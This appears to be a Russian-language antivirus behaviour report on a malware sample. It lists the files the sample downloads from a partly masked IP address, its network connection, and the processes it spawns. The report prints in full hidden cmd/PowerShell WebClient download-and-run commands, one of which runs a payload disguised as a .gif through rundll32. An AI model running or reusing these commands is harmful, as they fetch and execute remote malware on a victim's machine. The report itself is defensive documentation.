Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://54.##5.186.49/mm/lkjhasdf7sadf7.zip как %appdata%\winh.gif
Загружает
- http://54.##5.186.49/mm/dsfgsd8g7ds.zip as %appdata%\wizdf.zip
Сетевая активность
Подключается к
- '54.##5.186.49':80
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c call powershell(new-object system.net.webclient).downloadfile('http://54.##5.186.49/mm/dsfgsd8g7ds.zip','%APPDATA%\Wizdf.zip')' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c call powershell(new-object system.net.webclient).downloadfile('http://54.##5.186.49/mm/lkjhasdf7sadf7.zip','%APPDATA%\Winh.gif');start-process rundll32.exe "%APPDATA%\Winh.gif",PixarFlm' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c call powershell(new-object system.net.webclient).downloadfile('http://54.##5.186.49/mm/dsfgsd8g7ds.zip','%APPDATA%\Wizdf.zip')
- '%WINDIR%\syswow64\cmd.exe' /c call powershell(new-object system.net.webclient).downloadfile('http://54.##5.186.49/mm/lkjhasdf7sadf7.zip','%APPDATA%\Winh.gif');start-process rundll32.exe "%APPDATA%\Winh.gif",PixarFlm
- '%WINDIR%\syswow64\rundll32.exe' %APPDATA%\Winh.gif PixarFlm
